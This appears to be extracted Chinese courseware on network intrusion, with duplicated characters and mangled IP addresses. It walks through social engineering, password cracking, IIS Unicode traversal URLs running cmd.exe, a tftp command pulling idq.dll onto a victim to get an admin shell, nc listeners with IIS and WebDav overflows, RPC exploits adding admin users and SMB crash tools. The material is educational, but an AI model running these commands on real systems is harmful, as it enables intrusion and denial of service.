1、計算機網絡安全教程計算機網絡安全教程第五章第五章 網絡入侵網絡入侵 5.1物理攻擊與防范物理攻擊與防范5.2 暴力攻擊暴力攻擊5.3 Unicode Unicode漏洞專題漏洞專題5.4社會工程學攻擊社會工程學攻擊5 5 5.5緩沖區溢出攻擊緩沖區溢出攻擊5.6 拒絕服務攻擊拒絕服務攻擊5.7 分布式拒絕服務攻擊分布式拒絕服務攻擊5.8 其他漏洞攻擊其他漏洞攻擊 防范拒絕服務攻擊防范拒絕服務攻擊5.9社會工程學攻擊社會工程學攻擊5.15.1 社交工程是使用去獲得密碼和其他敏感信息的科學，研究一個站點的策略其中之一就是盡可能多的了解這個組織的個體，因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透

2、的組織那里獲得信息。社會工程學攻擊社會工程學攻擊 舉個例子：舉個例子：一組高中學生曾經想要進入一個當地的公司的計算機網絡，他們擬定了一個表格，調查看上去顯得是無害的個人信息，例如所有秘書和行政人員和他們的配偶、孩子的名字，這些從學生轉變成的黑客說這種簡單的調查是他們社會研究工作的一部分。利用這份表格這些學生能夠快速的進入系統，因為網絡上的大多數人是使用寵物和他們配偶名字作為密碼。網絡攻擊技術社交工程網絡攻擊技術社交工程n黑客們最常用的一種攻擊手段黑客們最常用的一種攻擊手段n能得到使用技術手段不能得到的好處能得到使用技術手段不能得到的好處n防火墻和防火墻和IDS對這種攻擊不起作用對這種攻擊不起作

3、用n需要高超的人際交往技術需要高超的人際交往技術n常用方式常用方式電話電子商務網絡攻擊技術社交工程網絡攻擊技術社交工程n社交工程種類社交工程種類假冒權威假扮同情個人利益改善自我感覺不引人注意的職業獎賞社交工程（社交工程（Social EngineeringSocial Engineering）n假冒權威假冒權威黑客冒充公司的領導人員在大公司中，不認識所有上司的情況非常普通在Internet上，黑客可以通過郵件列表發出入侵的安全警告，并提供解決問題的指令，指令被設計成能使黑客訪問系統。足夠顯眼的標題和時髦的行話社交工程（社交工程（Social EngineeringSocial Engineer

4、ing）n假扮假扮電話、電子郵件、聊天室和短消息里假扮你的熟人如果你是新來的職員，冒充你的同事n同情同情如果一個人打電話來，講述他的困難，你不幫助他嗎？n個人利益個人利益假冒來自財務部門的員工，訪問系統管理員社交工程（續）社交工程（續）n改善自我感覺改善自我感覺自我感覺良好的人易于被欺騙黑客進入熱情的經理房間，表明自己是來自市場部的新員工，會得到詳細的介紹社交工程（續）社交工程（續）n不引人注意的職業不引人注意的職業來自天然氣、電力公司或者電話公司的員工請求撥號等上機操作人們會單獨把黑客放在房間里n獎賞獎賞提供某種形式的獎賞會引誘人泄露信息口令比賽贏大獎、展示創造性，請列出密碼避免避免受到社交

5、工程攻擊受到社交工程攻擊n極度警惕極度警惕Do not trust any stranger即使是很友好的人懷疑一切聲稱并不代表他有權這樣做詢問他們的權限絕大多數社交工程在高度警惕下破產避免避免受到社交工程攻擊（續）受到社交工程攻擊（續）n驗證出處驗證出處當某人電子郵件要求時，要求來電話確證對于電話里的請求，要求回電號碼并確證員工號碼或者身份證避免避免受到社交工程攻擊（續）受到社交工程攻擊（續）n說不說不對于逾越日常行為準則的要求，要拒絕要求按照正常程序和規定書面報告和授權信息n用戶培訓用戶培訓培訓員工，提高安全意識物理攻擊與防范物理攻擊與防范5.25.2 獲取管理員密碼獲取管理員密碼1權限提

6、升權限提升2n物理安全是保護一些比較重要的設備不被接觸。n物理安全比較難防，因為攻擊往往來自能夠接觸到物理設備的用戶。 引引 言言獲取管理員密碼獲取管理員密碼1n用戶登錄以后，所有的用戶信息都存儲在系統的一個進程中，這個進程是：“winlogon.exe”，nWindows Logon Process，Windows NT 用戶登陸程序，管理用戶登錄和退出。該進程的正常路徑應是 C:WindowsSystem32 且是以 SYSTEM 用戶運行獲取管理員密碼獲取管理員密碼1案例案例5-15-1得到管理員密碼得到管理員密碼n用戶登錄以后，所有的用戶信息都存儲在系統的一個進程中，這個進程是：“wi

7、nlogon.exe”，可以利用程序將當前登錄用戶的密碼解碼出來，如圖5-1所示。獲取管理員密碼獲取管理員密碼1n使用FindPass等工具可以對該進程進行解碼，然后將當前用戶的密碼顯示出來。將FindPass.exe拷貝到C盤根目錄，執行該程序，將得到當前用戶得登錄名，如圖5-2所示。權限提升權限提升2n有時候，管理員為了安全，給其他用戶建立一個普通用戶帳號，認為這樣就安全了。常用的方法：n 社會工程學n 本地溢出n 利用scripts目錄的可執行權限n 替換系統服務n 替換admin常用程序n 利用autorun .infn Serv-U提升權限n SQL帳戶密碼泄露權限提升權限提升2n用

8、普通用戶帳號登錄后，可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個具有管理員權限的用戶。案例案例5-2 普通用戶建立管理員帳號普通用戶建立管理員帳號n利用Hacker帳戶登錄系統，在系統中執行程序GetAdmin.exe，程序自動讀取所有用戶列表，在對話框中點擊按鈕“New”，在框中輸入要新建的管理員組的用戶名，如圖5-5所示。案例案例5-2 普通用戶建立管理員帳號普通用戶建立管理員帳號n輸入一個用戶名“IAMHacker”，點擊按鈕“確定”以后，然后點擊主窗口的按鈕“OK”，出現添加成功的窗口，如圖5-6所示。暴力攻擊暴力攻擊5.35.3 字典文件字典文件1暴力破解操作系

9、統密碼暴力破解操作系統密碼2 暴力破解郵箱密碼暴力破解郵箱密碼3暴力破解軟件密碼暴力破解軟件密碼4n暴力攻擊是一種發現密碼的嘗試，其方法是系統地嘗試字母、數字和符號的每種可能組合，直到發現一個可起作用的正確組合。攻擊者總可以通過暴力攻擊獲得密碼，但這種方法的不利之處在于，可能需要數年才能找到一個密碼。根據密碼的長度和復雜性，也許有無數個可能的組合。n針對一個安全系統進行暴力攻擊需要大量的時間，需要極大的意志和決心。什么是暴力攻擊什么是暴力攻擊暴力攻擊暴力攻擊n暴力攻擊的一個具體例子是一個具體例子是，一個黑客試圖使用計算機和信息去破解一個密碼。n一個黑客需要破解段單一的被用非對稱密鑰加密非對稱密

10、鑰加密的信息，為了破解這種算法，一個黑客需要求助于非常精密復雜的方法，它使用120個工作站，兩個超級計算機利用從三個主要的研究中心獲得的信息，即使擁有這種配備，它也將花掉八天的時間去破解加密算法，實際上破解加密過程八天已是非常短暫的時間了。暴力破解暴力破解n兩種方式的破解兩種方式的破解n在線破解n在線登錄目標主機，通過程序循環輸入密碼嘗試正確的密碼輸入n可能會在日志里留下記錄，很容易被探測出來n離線破解n取得目標主機的密碼文件，然后在本地破解n花費時間較長，一般時攻擊系統取得一定權限后使用在線破解在線破解nWindowsWindows系統系統n使用NAT(NetBIOS Auditing To

11、ol)進行探測n在NetBIOS開放138，139端口提供SMB服務，允許用戶遠程訪問文件系統nWindows2000缺省共享所有驅動器和admin$n訪問文件系統時需要用戶身份驗證nNAT可以猜測用戶口令，從而取得目標機器的控制權nNAT用法：nat -o filename -u userlist -p passlist address在線破解在線破解nLinuxLinux系統系統n一般在telnet三次錯誤后，系統會斷開連接n在線破解的軟件較少離線破解離線破解n得到用戶的密碼文件，然后在本地破解得到用戶的密碼文件，然后在本地破解nWindowsWindows系統系統n用戶密碼存放在%sys

12、temroot%system32config和%systemroot%repair中n得到這個文件后可以使用L0phtcrack進行本地破解離線破解離線破解nLinuxLinux系統系統n用戶名和密碼存儲在/etc/passwd中n會被很多用戶看到該文件n為了加強安全性，將密碼存儲在etc/shadow中n只能由root存取n著名的破解工具：John the Rippern因為Linux在線破解困難，所以離線破解比較常見n很多管理員現在沒有使用shadow文件暴力破解手段暴力破解手段n暴力破解的手段暴力破解的手段n字典攻擊n強行攻擊n組合攻擊字典攻擊字典攻擊n字典：一些單詞或者字母和數字的組合

13、字典：一些單詞或者字母和數字的組合n使用字典的好處使用字典的好處n比較快速的得到用戶密碼，只需要在字典中進行查找字典攻擊前提字典攻擊前提n前提條件前提條件n絕大多數用戶選擇密碼總是有一定規律的n姓名：自己、父母、愛人、孩子n生日n電話號碼，身份證號碼，學號n英文單詞n上述組合n打開錢包，我就能知道你的密碼n設計一個好的字典是非常有必要的字典攻擊防御字典攻擊防御n防止字典攻擊的方法防止字典攻擊的方法n使用帶有特殊字符的密碼n密碼不是有規律的英語單詞強行攻擊強行攻擊n在選定的字母或者數字序列里生成所有包含這些字母在選定的字母或者數字序列里生成所有包含這些字母的口令的口令n密碼生成器，只要用戶指定字

14、母和數字和密碼的位數，就能生成字典n特點特點n密碼較多，所需時間較長n分布式攻擊n多臺計算機共同運算n適用于對用戶信息不夠了解的情況強行攻擊防御強行攻擊防御n對策對策n使用長的密碼n攻擊者需要構造出很大的字典，加大攻擊難度n經常更換密碼n需要在方便和安全中作出抉擇組合攻擊組合攻擊n綜合前兩種攻擊的優點綜合前兩種攻擊的優點n字典攻擊：速度較快n強行攻擊：發現所有的口令n根據掌握的用戶的不同信息，進行口令組合根據掌握的用戶的不同信息，進行口令組合n姓名縮寫和生日的組合n在字母組合后面加上一些數字 攻擊速度破解口令數量 字典攻擊 快 所有字典單詞強行攻擊慢所有口令組合攻擊中等以字典為基礎的單詞三種攻

15、擊的比較三種攻擊的比較 攻擊速度破解口令數量 字典攻擊 快 所有字典單詞強行攻擊慢所有口令組合攻擊中等以字典為基礎的單詞字典文件字典文件1n一次字典攻擊能否成功，很大因素上決定與字典文件字典攻擊能否成功，很大因素上決定與字典文件。一個好的字典文件可以高效快速的得到系統的密碼。攻擊不同的公司、不通地域的計算機，可以根據公司管理員的姓氏以及家人的生日，可以作為字典文件的一部分，公司以及部門的簡稱一般也可以作為字典文件的一部分，這樣可以大大的提高破解效率。字典文件字典文件1n一個字典文件本身就是一個標準的文本文件文本文件，其中的每一行就代表一個可能的密碼。目前有很多工具軟件專門來創建字典文件，圖5-

16、8是一個簡單的字典文件。暴力破解操作系統密碼暴力破解操作系統密碼2n字典文件為暴力破解提供了一條捷徑暴力破解提供了一條捷徑，程序首先通過掃描得到系統的用戶，然后利用字典中每一個密碼來登錄系統，看是否成功，如果成功則將密碼顯示暴力破解操作系統密碼暴力破解操作系統密碼2n案例5-3 暴力破解操作系統密碼 n比如使用圖5-8所示的字典文件，利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來，如圖5-9所示。暴力破解郵箱密碼暴力破解郵箱密碼3n郵箱的密碼一般需要設置到八位以上，否則七位以下的密碼容易被破解。n尤其七位全部是數字，更容易被破解。n案例5-4 電子郵箱暴力破解 n破解電

17、子郵箱密碼，一個比較著名的工具軟件是：黑雨POP3郵箱密碼暴力破解器，比較穩定的版本是2.3.1，主界面如圖5-10所示。暴力破解軟件密碼暴力破解軟件密碼4n目前許多軟件都具有加密的功能，比如Office文檔、Winzip文檔和Winrar文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數不夠長的話，同樣容易被破解。n案例5-5 Office文檔暴力破解 修改權限密碼修改權限密碼在對話框中選擇選項卡“安全性”，在打開權限密碼和修改權限密碼的兩個文本框中都輸入“999”，如圖5-12所示。輸入密碼輸入密碼n保存并關閉該文檔，然后再打開，就需要輸入密碼了，如圖5-13所示。

18、破解破解Word文檔密碼文檔密碼n該密碼是三位的，使用工具軟件，Advanced Office XP Password Recovery可以快速破解Word文檔密碼，主界面如圖5-14所示。破解破解Word文檔密碼文檔密碼n點擊工具欄按鈕“Open File”，打開剛才建立的Word文檔，程序打開成功后會在Log Window中顯示成功打開的消息，如圖5-15所示。破解破解Word文檔密碼文檔密碼n設置密碼長度最短是一位，最長是三位，點擊工具欄開始的圖標，開始破解密碼，大約兩秒鐘后，密碼被破解了，如圖5-16所示。UnicodeUnicode漏洞專題漏洞專題5.45.4 Unicode漏洞的檢

19、測方法漏洞的檢測方法1使用使用Unicode漏洞刪除主頁漏洞刪除主頁2引言引言n通過打操作系統的補丁程序，就可以消除漏洞。只要是針對漏洞進行攻擊的案例都依賴于操作系統是否打了相關的補丁。是2000-10-17發布的，受影響的版本：nMicrosoft IIS 5.0+Microsoft Windows 2000Microsoft IIS 5.0+Microsoft Windows 2000系列版本系列版本nMicrosoft IIS 4.0+ Microsoft Windows NT 4.0Microsoft IIS 4.0+ Microsoft Windows NT 4.0n消除該漏洞的方式

20、是安裝操作系統的補丁消除該漏洞的方式是安裝操作系統的補丁，只要安裝了，只要安裝了SP1SP1以以后，該漏洞就不存在了。微軟后，該漏洞就不存在了。微軟IIS 4.0IIS 4.0和和5.05.0都存在利用擴展都存在利用擴展UNICODEUNICODE字符取代字符取代/和和而能利用而能利用././目錄遍歷的漏洞。目錄遍歷的漏洞。是2000-10-17發布的，受影響的版本：nMicrosoft IIS 5.0+Microsoft Windows 2000Microsoft IIS 5.0+Microsoft Windows 2000系列系列版本版本nMicrosoft IIS 4.0+ Micros

21、oft Windows NT 4.0Microsoft IIS 4.0+ Microsoft Windows NT 4.0n消除該漏洞的方式是安裝操作系統的補丁消除該漏洞的方式是安裝操作系統的補丁，只要安裝，只要安裝了了SP1SP1以后，該漏洞就不存在了。微軟以后，該漏洞就不存在了。微軟IIS 4.0IIS 4.0和和5.05.0都都存在利用擴展存在利用擴展UNICODEUNICODE字符取代字符取代/和和而能利用而能利用././目錄遍歷的漏洞。目錄遍歷的漏洞。Unicode漏洞的檢測方法漏洞的檢測方法1n使用掃描工具來檢測Unicode漏洞是否存在，使用上一章介紹的X-Scan來對目標系統進

22、行掃描，目標主機IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以了，X-Scan設置如圖5-17所示。Unicode漏洞的檢測方法漏洞的檢測方法1n將主機添加到目標地址，掃描結果如圖5-18所示。Unicode漏洞的檢測方法漏洞的檢測方法1n可以看出，存在許多系統的漏洞。只要是/scripts開頭的漏洞都是Unicode漏洞。比如：n/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dirn其中/scripts目錄是IIS提供的可以執行命令的一個有執行程序權限的一個目錄，在IIS中的位置如圖5-19所示。

23、Unicode漏洞的檢測方法漏洞的檢測方法1nscripts目錄一般系統盤根目錄下的Inetpub目錄下，如圖5-20所示。Unicode漏洞的檢測方法漏洞的檢測方法1n在Windows的目錄結構中，可以使用兩個點和一個斜線“./”來訪問上一級目錄，在瀏覽器中利用“scripts/././”可以訪問到系統盤根目錄，訪問“scripts/././winnt/system32”就訪問到系統的系統目錄了，在system32目錄下包含許多重要的系統文件，比如cmd.exe文件，可以利用該文件新建用戶，刪除文件等操作。Unicode漏洞的檢測方法漏洞的檢測方法1n瀏覽器地址欄中禁用符號“./”，但是可以

24、使用符號“/”的Unicode的編碼。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語句是執行dir命令列出目錄結構。Unicode漏洞漏洞n此漏洞從中文IIS4.0+SP6開始，還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，臺灣繁體中文也同樣存在這樣的漏洞。在NT4中/編碼為“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。Unicode漏洞漏洞n但從國外某些站點得來的資料顯示，還有以下的編碼可以實現對該漏洞的檢測，

25、該編碼存在于日文版、韓文版等操作系統。n%c1%pcn%c0%9vn%c0%qfn%c1%8sn%e0%80%afUnicode漏洞漏洞n利用該漏洞讀取出計算機上目錄列表，比如讀取C盤的目錄，只要在瀏覽器中輸入n“09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”利用利用Unicode漏洞讀取系統盤目錄漏洞讀取系統盤目錄利用利用Unicode漏洞讀取系統盤目錄漏洞讀取系統盤目錄n利用語句得到對方計算機上裝了幾個操作系統以及操作系統的類型，只要讀取C盤下的boot.ini文件就可以了。使用的語句是：nhtt

26、p:/09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inin執行的結果如圖5-22所示。使用使用Unicode漏洞刪除主漏洞刪除主2使用使用Unicode漏洞刪除主漏洞刪除主2拷貝文件拷貝文件 為了是使用方便，利用語句將cmd.exe文件拷貝到scripts目錄，并改名為c.exe，使用的語句是： 09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+C:winntsystem32cmd.exe+c.exe 程序執行結果如圖5-24

27、所示。查看查看C盤的目錄盤的目錄 以后使用cmd.exe命令就方便了，比如查看C盤的目錄，使用的語句就可以簡化為： 09/scripts/c.exe?/c+c:c: 執行的結果如圖5-25所示。利用利用Unicode漏洞入侵系統漏洞入侵系統 在地址欄上執行命令，用戶的權限比較低，像net等系統管理指令不能執行。利用Unicode可以入侵對方的系統，并得到管理員權限。首先需要向對方服務器上傳一些文件。 入侵的第一步入侵的第一步，建立tftp服務器，向對方的scripts文件夾傳幾個文件。利用利用Unicode漏洞入侵系統漏洞入侵系統 需要上傳一個名為“idq.d

28、ll”的文件，為了上傳這個文件，首先在本地計算機上搭建一個TFTP服務器，普通文件傳輸協議TFTP（Text File Transmission Protocol）一般用來傳輸單個文件。使用工具軟件tftpd32.exe建立服務器。將idq.dll和tftpd32.exe放在本地的同一目錄下，執行tftpd32.exe程序，主界面如圖5-26所示。 利用利用Unicode漏洞入侵系統漏洞入侵系統 這樣在本地的TFTP的服務器就建立好了，保留這個窗口，通過該服務器向對方傳遞idq.dll文件。在瀏覽器中執行命令： “09/scripts/.%c0%2f./win

29、nt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”， 命令其實是“tftp i 10 get idq.dll”意思是從10服務器上獲取idq.dll文件，執行成功的界面如圖5-27所示。 上載文件上載文件查看查看scripts目錄目錄 上傳完畢后可以查看一下scripts目錄，是否真的上傳成功了。如圖5-28所示。入侵對方主機入侵對方主機 說明已經成功的在scripts目錄中上傳了一個idq.dll文件， 拷貝ispc.exe文件到本地計算機的C盤根目錄，在DOS命令行下執行命令： “i

30、spc.exe 09/scripts/idq.dll”，連接成功后就直接進入了對方的DOS命令行下，而且具有管理員權限，入侵的過程5-29所示。 建立用戶建立用戶 可以在對方計算機上做管理員可以做的一切事情，比如添加用戶，建立一個用戶名為“Hacker123”，密碼也是“Hacker123”的用戶，如圖5-30所示。其他漏洞攻擊其他漏洞攻擊5.55.5 利用打印漏洞利用打印漏洞1SMB致命攻擊致命攻擊2 利用打印漏洞利用打印漏洞經過測試，該漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保證100%入侵成功。 ，使用的語法格式是：“cniis

31、09 0”，第一個參數是目標的IP地址，第二參數是目標操作系統的補丁號，因為09沒有打補丁，這里就是0。拷貝cniis.exe文件到C盤根目錄，執行程序如圖5-31所示。1SMB致命攻擊致命攻擊nSMB（Session Message Block，會話消息塊協議會話消息塊協議）又叫做NetBIOS或LanManager協議，用于不同計算機之間文件、打印機、串口和通訊的共享文件、打印機、串口和通訊的共享和用于Windows平臺上提供磁盤和打印機的共享。nSMB協議版本有很多種，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.

32、12版本。2SMB致命攻擊致命攻擊n利用該協議可以進行各方面的攻擊，比如可以抓取其他用戶訪問自己計算機共享目錄的SMB會話包，然后利用SMB會話包登錄對方的計算機。下面介紹利用SMB協議讓對方操作系統系統重新啟動或者藍屏。2致命攻擊致命攻擊n使用的工具軟件是：SMBDie V1.0SMBDie V1.0，該軟件對打了SP3、SP4的計算機依然有效，必須打專門的SMB補丁，軟件的主界面如圖5-32所示。致命攻擊致命攻擊n攻擊的時候，需要兩個參數：對方的IP地址和對方的機器名，窗口中分別輸入這兩項，如圖5-33所示。致命攻擊致命攻擊n然后再點按鈕“Kill”，如果參數輸入沒有錯誤的話，對方計算機立

33、刻重啟或藍屏，命中率幾乎100%，被攻擊的計算機藍屏界面如圖5-34所示。緩沖區溢出攻擊緩沖區溢出攻擊5.65.6 RPC漏洞溢出漏洞溢出1利用利用IIS溢出進行攻擊溢出進行攻擊2 利用利用WebDav遠程溢出遠程溢出 3引言引言 目前最流行的一種攻擊技術就是緩沖區溢出攻擊緩沖區溢出攻擊。當目標操作系統收到了超過了它的最大能接收的信超過了它的最大能接收的信息量息量的時候，將發生緩沖區溢出。這些多余的數據將使程序的緩沖區溢出，然后覆蓋了實際的程序數據，緩沖區溢出使目標系統的程序被修改，經過這種修改的結果使在系統上產生一個后門。 這項攻擊對技術要求比較高，但是攻擊的過程卻非常簡單。緩沖區溢出原理很

34、簡單，比如程序：引言引言 void function(char * szPara1)char buff16;strcpy(buffer, szPara1); 程序中利用strcpy函數將szPara1中的內容拷貝到buff中，只要szPara1的長度大于16，就會造成緩沖區溢出。存在strcpy函數這樣問題的C語言函數還有：strcat()、gets()、scanf()等。引言引言 void function(char * szPara1)char buff16;strcpy(buffer, szPara1); 程序中利用strcpy函數將szPara1中的內容拷貝到buff中，只要szPar

35、a1的長度大于16，就會造成緩沖區溢出。存在strcpy函數這樣問題的C語言函數還有：strcat()、gets()、scanf()等。緩存區溢出歷史緩存區溢出歷史 緩存區溢出歷史 1988年的Morris蠕蟲病毒，成功攻擊了6000多臺機器：利用UNIX服務finger中的緩沖區溢出漏洞來獲得訪問權限，得到一個shell 1996年前后，開始出現大量的Buffer Overflow攻擊，因此引起人們的廣泛關注 源碼開放的操作系統首當其沖 隨后，Windows系統下的Buffer Overflows也相繼被發掘出來 已經有一些非常經典細致的文章來介紹與Buffer overflows有關的技術

36、緩沖區溢出的基本介紹緩沖區溢出的基本介紹 基本的思想 通過修改某些內存區域，把一段惡意代碼存儲到一個buffer中，并且使這個buffer被溢出，以便當前進程被非法利用(執行這段惡意的代碼) “SQL Slammer”蠕蟲王的發作原理，就是利用未及時更新補丁的MS SQL Server數據庫緩沖溢出漏洞。采用不正確的方式將數據發到MS Sql Server的監聽端口，這個錯誤可以引起緩沖溢出攻擊。 出現的MSBLAST病毒正是利用了微軟關于RPC 接口中遠程任意可執行代碼漏洞，“中招”的機器會反復重啟，或者拷貝、粘貼功能不工作等現象。 僅去年緩沖區溢出就占使 CERT/CC 提出建議的所有重大

37、安全性錯誤的百分之五十以上。并且數據顯示這一問題正在擴大，而不是在縮減。 緩沖區溢出的實例緩沖區溢出的實例緩沖區溢出的保護方法緩沖區溢出的保護方法 編寫正確的代碼 最簡單的方法就是用grep來搜索源代碼中容易產生漏洞的庫的調用 為了對付這些問題，人們已經開發了一些高級的查錯工具，如faultinjection等。這些工具的目的在于通過人為隨機地產生一些緩沖區溢出來尋找代碼的安全漏洞。 緩沖區溢出的保護方法緩沖區溢出的保護方法 非執行的緩沖區 通過使被攻擊程序的數據段地址空間不可執行，從而使得攻擊者不可能執行被植入被攻擊程序輸入緩沖區的代碼，這種技術被稱為非執行的緩沖區技術。事實上，很多老的Un

38、ix系統都是這樣設計的，但是近來的Unix和MS Windows系統為實現更好的性能和功能，往往在數據段中動態地放人可執行的代碼。所以為了保持程序的兼容性不可能使得所有程序的數據段不可執行。但是我們可以設定堆棧數據段不可執行，這樣就可以最大限度地保證了程序的兼容性。 緩沖區溢出的保護方法緩沖區溢出的保護方法 數組邊界檢查 程序指針完整性檢查 RPC漏洞溢出漏洞溢出 遠程過程調用RPC（Remote Procedure Call)，是操作系統的一種消息傳遞功能，允許應用程序呼叫網絡上的計算機。當系統啟動的時候，自動加載RPC服務。可以在服務列表中看到系統的RPC服務，如圖5-35所示。1利用利用

39、RPC漏洞建立超級用戶漏洞建立超級用戶 RPC溢出漏洞，對SP4也適用，必須打專用補丁。利用工具工具scanms.exe文件文件檢測RPC漏洞，該工具是ISS安全公司2003年7月30日發布的，運行在命令行下用來檢測指定IP地址范圍內機器是否已經安裝了“DCOM RPC 接口遠程緩沖區溢出漏洞（823980-MS03-026）”補丁程序。 如果沒有安裝補丁程序，該IP地址就會顯示出“VULN”。首先拷貝該文件到C盤根目錄，現在要檢查地址段09到10的主機，執行命令“scanms.exe 09-10”，檢查過

40、程如圖5-36所示。檢查緩沖區溢出漏洞檢查緩沖區溢出漏洞利用緩沖區溢出漏洞攻擊利用緩沖區溢出漏洞攻擊 利用工具軟件attack.exe對09進行攻擊。攻擊的結果將在對方計算機上建立一個具有管理員權限的用戶，并終止了對方的RPC服務。 新建用戶的用戶名和密碼都是qing10，這樣就可以登錄對方計算機了，RPC服務停止操作系統將有許多功能不能使用，非常容易被管理員發現，使用工具軟件OpenRpcSs.exe來給對方重啟RPC服務。攻擊的全過程如圖5-37所示。攻擊的全過程攻擊的全過程 IIS溢出原理溢出原理 IIS緩沖區溢出 IIS：windows系統上最不安全的服務系統上最

41、不安全的服務 ISAPI提供對管理腳本提供對管理腳本( (.ida文件文件) )和和Inernet數據數據( (.idq) )查詢的支持查詢的支持 向向idq.dll發送一個過量的變量發送一個過量的變量GET /null.ida? buffer=X HTTP/1.1Host: 任意值任意值 一些具體的攻擊方法沒有公開一些具體的攻擊方法沒有公開 Code RedCode Red蠕蟲利用了這一漏洞蠕蟲利用了這一漏洞2利用利用IIS溢出進行攻擊溢出進行攻擊 案例5-11 利用IIS溢出入侵系統 利用軟件Snake IIS溢出工具可以讓對方的IIS溢出，還可以捆綁執行的命令和在對方計算機上開辟端口，工

42、具軟件的主界面如圖5-38所示。2 該軟件適用于各種類型的操作系統，比如對09進行攻擊，09的操作系統的Windows 2000，沒有安裝補丁程序，攻擊完畢后，開辟一個813端口，并在對方計算機上執行命令“dir c:”設置如圖5-39所示。利用利用IIS溢出進行攻擊溢出進行攻擊2 點擊按鈕“IDQ溢出”，出現攻擊成功的提示框，如圖5-40所示。2利用利用IIS溢出進行攻擊溢出進行攻擊 這個時候，813端口已經開放，利用工具軟件nc.exe連接到該端口，將會自動執行剛才發送的DOS命令“dir c:”，使用的語法是：nc.exe -vv 172.18

43、.25.109 813，其中-vv是程序的參數，813是目標端口。可以看到命令的執行結果，如圖5-41所示。利用利用IIS溢出進行攻擊溢出進行攻擊2監聽本地端口監聽本地端口 下面利用nc.exe和snake工具的另外一種組合入侵對方計算機。首先利用nc.exe命令監聽本地的813端口。使用的基本語法是“nc -l -p 813”，執行的過程如圖5-42所示。 這個窗口就這樣一直保留，啟動工具軟件snake，本地的IP地址是10，要攻擊的計算機的IP地址是09，選擇溢出選項中的第一項，設置IP為本地IP地址，端口是813，如圖5-43所示。監聽本地端口

44、監聽本地端口 設置好以后，點擊按鈕“IDQ溢出”，程序顯示對話框如圖4-44所示。監聽本地端口監聽本地端口 查看nc命令的DOS框，在該界面下，已經執行了設置的DOS命令。將對方計算機的C盤根目錄列出來，如圖4-45所示。監聽本地端口監聽本地端口 IIS默認提供了對WebDav的支持，通過WebDav可以通過HTTP向用戶提供遠程文件存儲的服務。但是WebDav使用了ntDll.dll函數，這個函數對在長度檢查中存在一個整數溢出問題，可以利用此漏洞獲取權限。WebDav遠程溢出原理遠程溢出原理3 需要使用工具軟件nc.exe和webdavx3.exe，首先在DOS命令行下執行webdavx3.

45、exe，如果執行的話，該程序將提示已經過期了，如圖4-46所示。利用利用WebDav遠程溢出遠程溢出3攻擊攻擊 修改本地系統時間到2001年，這樣就可以攻擊了，在命令后面直接跟對方的IP地址就可以了，現在要攻擊的計算機是09，執行情況如圖4-47所示。入侵對方的計算機入侵對方的計算機 該程序不能自動退出，當發現程序長時間沒有反映的時候，需要手工按下“CTRL+C”退出程序。該程序在對方的計算機上開了一個端口7788，依然可以nc.exe程序入侵對方的計算機，過程如圖4-48所示。拒絕服務攻擊拒絕服務攻擊5.75.7 SYN風暴風暴1Smurf攻擊攻擊2 利用處理程序錯誤進

46、行攻擊利用處理程序錯誤進行攻擊 3拒絕服務攻擊介紹拒絕服務攻擊介紹 拒絕服務攻擊的簡稱是：DoS（Denial of Service）攻擊，凡是造成目標計算機拒絕提供服務的攻擊都稱為DoS攻擊，其目的是使目標計算機或網絡無法提供正常的服務。 最常見的DoS攻擊是：計算機網絡帶寬攻擊和連通性攻擊。帶寬攻擊是以極大的通信量沖擊網絡，使網絡所有可用的帶寬都被消耗掉，最后導致合法用戶的請求無法通過。連通性攻擊指用大量的連接請求沖擊計算機，最終導致計算機無法再處理合法用戶的請求。DoSDoS的技術歷史的技術歷史 早期的Internet蠕蟲病毒 Robert Morris的RTM蠕蟲 消耗網絡資源 分片裝

47、配，非法的分片裝配，非法的TCP標志，標志，SYN Flood，等，等 利用系統實現上的缺陷，點對點形式 Ping of Death, IP分片重疊 分布式DoS(DDoS)攻擊 最著名的smurf攻擊 針對不同的系統，攻擊的結果可能不同，但是攻擊的攻擊的根本都是利用這些系統中根本都是利用這些系統中TCP/IP協議族的設計弱點和協議族的設計弱點和缺點缺點.只有對現有TCP/IP協議族進行重大改變才能修正這些缺陷。目前還沒有一個完整的解決方案，但是可以采取一些措施盡量降低這種攻擊發生的可能性，減少損失。SYN風暴風暴1 IP協議是Internet網絡層的標準協議，提供了不可靠的無連接的網絡分組傳

48、輸服務。IP協議的基本數據傳輸單元成為網絡包。 TCP協議位于IP協議和應用層協議之間，提供了可靠的面向連接數據流傳輸服務。TCP通過流控制機制和重傳等技術來實現可靠的數據報傳輸。SYN風暴背景介紹風暴背景介紹 握手握手的第一報文段的碼元字段的SYN為被置為被置1.第二個報文的SYN和ACK問均被置1，指出這是對第一個SYN報文段的確認并繼續握手操作。最后一個握手報文僅僅是一個確認信息，通知目標主機已成功建立了雙方所同意的這個連接。SYN風暴背景介紹風暴背景介紹 針對每個連接，連接雙方都要為該連接分配以下內存資源。 （1）socket結構：描述所使用的協議、狀態信息、地址信息、連接結構：描述所

49、使用的協議、狀態信息、地址信息、連接隊列、緩沖區和其他標志位等。隊列、緩沖區和其他標志位等。 （2）Internet協議控制塊結構：描述協議控制塊結構：描述TCP狀態信息、狀態信息、IP地址、端口地址、端口號、號、IP頭原型、目標地址及其其他選項等。頭原型、目標地址及其其他選項等。 （3）TCP控制塊結構：描述時鐘信息、序列號、流控制信息及帶外控制塊結構：描述時鐘信息、序列號、流控制信息及帶外數據等。數據等。SYN風暴背景介紹風暴背景介紹SYN-SENTESTAB-LISHEDSYN-RCVDLISTENESTAB-LISHED用三次握手建立用三次握手建立 TCP 連接的各狀態連接的各狀態 S

